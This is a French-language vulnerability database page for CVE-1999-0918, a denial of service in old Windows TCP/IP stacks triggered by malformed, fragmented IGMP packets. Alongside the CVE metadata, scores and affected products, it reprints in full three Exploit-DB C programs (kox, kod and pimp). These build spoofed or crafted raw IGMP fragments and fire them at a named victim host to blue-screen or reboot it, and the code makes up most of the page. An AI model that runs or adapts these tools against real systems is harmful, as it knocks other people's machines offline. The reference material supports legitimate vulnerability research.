CVE-1999-0918 : Détail

CVE-1999-0918

A03-Injection
0.43%V3
Network
2000-01-04
04h00 +00:00
2024-08-01
16h55 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Denial of service in various Windows systems via malformed, fragmented IGMP packets.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-20 Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.8 AV:N/AC:L/Au:N/C:N/I:N/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 19413

Date de publication : 1999-07-02 22h00 +00:00
Auteur : Coolio
EDB Vérifié : Yes

// source: https://www.securityfocus.com/bid/514/info The Windows 98 and Windows 2000 TCP/IP stacks were not built to reliably tolerate malformed IGMP headers. When one is received, the stack will sometimes fail with unpredictable results ranging from a Blue Screen to instantaneous reboot. /*** Kox by Coolio (coolio@k-r4d.com) this was a successful attempt to duplicate klepto/defile's kod win98 exploit and add spoofing support to it. me and defile made this a race to see who could do spoofing kod first. he won. (mine's better!) my kox and defile's skod output about the same packets but he had skod working a few hours before i had kox working. affected systems: windows 98, windows 98 SE, windows 2000 build 2000 results: bluescreen, tcp/ip stack failure, lockup, or instant reboot thanks to klepto and defile for making kod, psilord for wanting to understand what we were doing, greg for telling me about iphdr.ihl, mancide for letting me use his win98 boxen to test on, and the few other people i crashed trying to get this working right. also thanks to the authors of elvis for making such a badass editor. ***/ #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <netdb.h> #include <string.h> #include <errno.h> #include <pwd.h> #include <time.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/utsname.h> #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/ip_icmp.h> #include <netinet/igmp.h> void usage(char *arg) { printf("Kox by Coolio (coolio@k-r4d.com)\n"); printf("Usage: %s <victim>\n", arg); exit(1); } unsigned int randip() { struct hostent *he; struct sockaddr_in sin; char *buf = (char *)calloc(1, sizeof(char) * 16); sprintf(buf, "%d.%d.%d.%d", (random()%191)+23, (random()%253)+1, (random()%253)+1, (random()%253)+1); inet_aton(buf, (struct in_addr *)&sin); return sin.sin_addr.s_addr; } unsigned short in_cksum(unsigned short *buh, int len) { register long sum = 0; unsigned short oddbyte; register unsigned short answer; while(len > 1) { sum += *buh++; len -= 2; } if(len == 1) { oddbyte = 0; *((unsigned char *)&oddbyte) = *(unsigned char *)buh; sum += oddbyte; } sum = (sum >> 16) + (sum & 0xFFFF); sum += (sum >> 16); answer = ~sum; return answer; } int nuke_igmp(struct sockaddr_in *victim, unsigned long spoof) { int BIGIGMP = 1500; unsigned char *pkt; struct iphdr *ip; struct igmphdr *igmp; struct utsname *un; struct passwd *p; int i, s; int id = (random() % 40000) + 500; pkt = (unsigned char *)calloc(1, BIGIGMP); ip = (struct iphdr *)pkt; igmp = (struct igmphdr *)(pkt + sizeof(struct iphdr)); ip->version = 4; ip->ihl = (sizeof *ip) / 4; ip->ttl = 255; ip->tot_len = htons(BIGIGMP); ip->protocol = IPPROTO_IGMP; ip->id = htons(id); ip->frag_off = htons(IP_MF); ip->saddr = spoof; ip->daddr = victim->sin_addr.s_addr; ip->check = in_cksum((unsigned short *)ip, sizeof(struct iphdr)); igmp->type = 0; igmp->group = 0; igmp->csum = in_cksum((unsigned short *)igmp, sizeof(struct igmphdr)); for(i = sizeof(struct iphdr) + sizeof(struct igmphdr) + 1; i < BIGIGMP; i++) pkt[i] = random() % 255; #ifndef I_GROK un = (struct utsname *)(pkt + sizeof(struct iphdr) + sizeof(struct igmphdr) + 40); uname(un); p = (struct passwd *)((void *)un + sizeof(struct utsname) + 10); memcpy(p, getpwuid(getuid()), sizeof(struct passwd)); #endif if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("error: socket()"); return 1; } if(sendto(s, pkt, BIGIGMP, 0, victim, sizeof(struct sockaddr_in)) == -1) { perror("error: sendto()"); return 1; } usleep(1000000); for(i = 1; i < 5; i++) { if(i > 3) ip->frag_off = htons(((BIGIGMP-20) * i) >> 3); else ip->frag_off = htons(((BIGIGMP-20) * i) >> 3 | IP_MF); sendto(s, pkt, BIGIGMP, 0, victim, sizeof(struct sockaddr_in)); usleep(2000000); } free(pkt); close(s); return 0; } int main(int argc, char *argv[]) { struct sockaddr_in victim; struct hostent *he; int i; srandom(time(NULL)); if(argc < 2) usage(argv[0]); if((he = gethostbyname(argv[1])) == NULL) { herror(argv[1]); exit(1); } memcpy(&victim.sin_addr.s_addr, he->h_addr, he->h_length); victim.sin_port = htons(0); victim.sin_family = PF_INET; printf("IGMP> "); fflush(stdout); for(i = 0; i < 10; i++) { nuke_igmp(&victim, randip()); printf("."); fflush(stdout); } printf("\n"); fflush(stdout); }
Exploit Database EDB-ID : 19414

Date de publication : 1999-07-02 22h00 +00:00
Auteur : klepto
EDB Vérifié : Yes

// source: https://www.securityfocus.com/bid/514/info The Windows 98 and Windows 2000 TCP/IP stacks were not built to reliably tolerate malformed IGMP headers. When one is received, the stack will sometimes fail with unpredictable results ranging from a Blue Screen to instantaneous reboot. /* ::: kod.c (kiss of death) version 1.2 ::: [author] kod.c bug found by klepto / klepto@levitate.net / rewritten by ignitor / ignitor@EFnet ::: [stuph ] works on bsd/linux/*nix ::: [notes ] bluescreens windows users(98/98se) and kills tcp stack ::: [m$ bug] windows handles igmp badly and this is the result ::: [greets] amputee/nizda/nyt/ignitor/skyline/codelogic/ill`/conio/egotr ip/TFreak/napster ::: [greets] dist(test monkey)/naz(you rule period.)/#havok/ #irc_addict/#kgb/#eof/everyone ::: [action] ./kod <host> and BEWM! ::: [rant ] there will be lots of rewrites to this.. just get our name right! de omnibus dubitandum */ /* windows core dump output (*whee*) An exception 0E has occurred at 0028:C14C9212 in VxD VIP (01) + 00006C72. This was called from 0028:C183FF54 in VcD PPPMAC (04) + 000079BR. It may be possible to continue normally(*not*). */ #include <stdio.h> #include <string.h> #include <stdlib.h> #include <netinet/in.h> #include <netdb.h> #include <sys/time.h> #include <sys/types.h> #include <sys/socket.h> #include <arpa/inet.h> #include <unistd.h> struct iphdr { unsigned char ihl:4, version:4, tos; unsigned short tot_len, id, frag_off; unsigned char ttl, protocol; unsigned short check; unsigned int saddr, daddr; }; struct igmphdr { unsigned char type, code; unsigned short cksum; struct in_addr group; }; unsigned short in_chksum(unsigned short *, int); long resolve(char *); long resolve(char *host) { struct hostent *hst; long addr; hst = gethostbyname(host); if (hst == NULL) return(-1); memcpy(&addr, hst->h_addr, hst->h_length); return(addr); } int main(int argc, char *argv[]) { struct sockaddr_in dst; struct iphdr *ip; struct igmphdr *igmp; long daddr, saddr; int s, i=0, c, len; char buf[1500]; if (argc < 3) { printf("KOD spoofer by Ignitor and klepto\n"); printf("Usage: %s <src> <dst>\n", *argv); return(1); } daddr = resolve(argv[2]); saddr = resolve(argv[1]); memset(buf, 0, 1500); ip = (struct iphdr *)&buf; igmp = (struct igmphdr *)&buf[sizeof(struct iphdr)]; dst.sin_addr.s_addr = daddr; dst.sin_family = AF_INET; ip->ihl = 5; ip->version = 4; ip->tos = 0; ip->tot_len = htons(10933); ip->id = htons(48648); ip->ttl = 64; ip->protocol = IPPROTO_IGMP; ip->check = in_chksum((unsigned short *)ip, sizeof(struct iphdr)); ip->saddr = saddr; ip->daddr = daddr; s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if (s == -1) return(1); printf("Sending IGMP packets: %s -> %s\n", argv[1], argv [2]); for (c=0;c<2;c++) { len = 220; ip->frag_off = htons(0x73a); for (i=0;;i++) { if (sendto(s,&buf,len,0,(struct sockaddr *)&dst,sizeof (struct sockaddr_in)) == -1) { perror("Error sending packet"); exit(-1); } if (ntohs(ip->frag_off) == 0x2000) break; len = 1500; if (!i) ip->frag_off = htons(0x2681); else ip->frag_off = htons(ntohs(ip->frag_off) - 185); ip->check = in_chksum((unsigned short *)ip, sizeof (struct iphdr)); } } return(1); } unsigned short in_chksum(unsigned short *addr, int len) { register int nleft = len; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *addr++; nleft -= 2; } if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)addr; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); }
Exploit Database EDB-ID : 19415

Date de publication : 1999-04-05 22h00 +00:00
Auteur : Rob Mosher
EDB Vérifié : Yes

// source: https://www.securityfocus.com/bid/514/info The Windows 98 and Windows 2000 TCP/IP stacks were not built to reliably tolerate malformed IGMP headers. When one is received, the stack will sometimes fail with unpredictable results ranging from a Blue Screen to instantaneous reboot. /* ** pimp.c 6/4/99 by Rob Mosher: nyt@deadpig.org ** exploits bug in m$'s ip stack ** rewrite by nyt@EFnet ** bug found by klepto ** usage: pimp <host> */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <time.h> #include <netdb.h> #include <netinet/in.h> #include <netinet/in_systm.h> #include <netinet/ip.h> #include <sys/socket.h> struct igmp { unsigned char igmp_type; unsigned char igmp_code; unsigned short igmp_cksum; struct in_addr igmp_group; }; #define ERROR(a) {printf("ERROR: %s\n", a);exit(-1);} u_long resolve(char *); int main(int argc, char *argv[]) { int nsock, ctr; char *pkt, *data; struct ip *nip; struct igmp *nigmp; struct sockaddr_in s_addr_in; setvbuf(stdout, NULL, _IONBF, 0); printf("pimp.c by nyt\n"); if(argc != 2) ERROR("usage: pimp <host>"); if((nsock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) ERROR("could not create raw socket"); pkt = malloc(1500); if(!pkt) ERROR("could not allocate memory"); memset(&s_addr_in, 0, sizeof(s_addr_in)); memset(pkt, 0, 1500); nip = (struct ip *) pkt; nigmp = (struct igmp *) (pkt + sizeof(struct ip)); data = (char *)(pkt + sizeof(struct ip) + sizeof(struct igmp)); memset(data, 'A', 1500-(sizeof(struct ip) + sizeof(struct igmp))); s_addr_in.sin_addr.s_addr = resolve(argv[1]); nip->ip_v = 4; nip->ip_hl = 5; nip->ip_tos = 0; nip->ip_id = 69; nip->ip_ttl = 255; nip->ip_p = IPPROTO_IGMP; nip->ip_sum = 0; nip->ip_dst.s_addr = s_addr_in.sin_addr.s_addr; nip->ip_src.s_addr = 2147100000; nigmp->igmp_type = 2; nigmp->igmp_code = 31; nigmp->igmp_cksum = 0; inet_aton("128.1.1.1", &nigmp->igmp_group); printf("pimpin' dem trick-ass-bitches"); for(ctr = 0;ctr < 15;ctr++) { printf("."); nip->ip_len = 1500; nip->ip_off = htons(IP_MF); sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in, sizeof(s_addr_in)); nip->ip_off = htons(1480/8)|htons(IP_MF); sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in, sizeof(s_addr_in)); nip->ip_off = htons(5920/8)|htons(IP_MF); sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in, sizeof(s_addr_in)); nip->ip_len = 831; nip->ip_off = htons(7400/8); sendto(nsock, pkt, 831, 0, (struct sockaddr *) &s_addr_in, sizeof(s_addr_in)); usleep(500000); } printf("*slap* *slap* bitch, who yo daddy\n"); shutdown(nsock, 2); close(nsock); } u_long resolve(char *host) { struct hostent *he; u_long ret; if(!(he = gethostbyname(host))) { herror("gethostbyname()"); exit(-1); } memcpy(&ret, he->h_addr, sizeof(he->h_addr)); return ret; }

Products Mentioned

Configuraton 0

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_95 >> Version *

Microsoft>>Windows_98 >> Version *

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Microsoft>>Windows_nt >> Version 4.0

Références

http://www.securityfocus.com/bid/514
Tags : vdb-entry, x_refsource_BID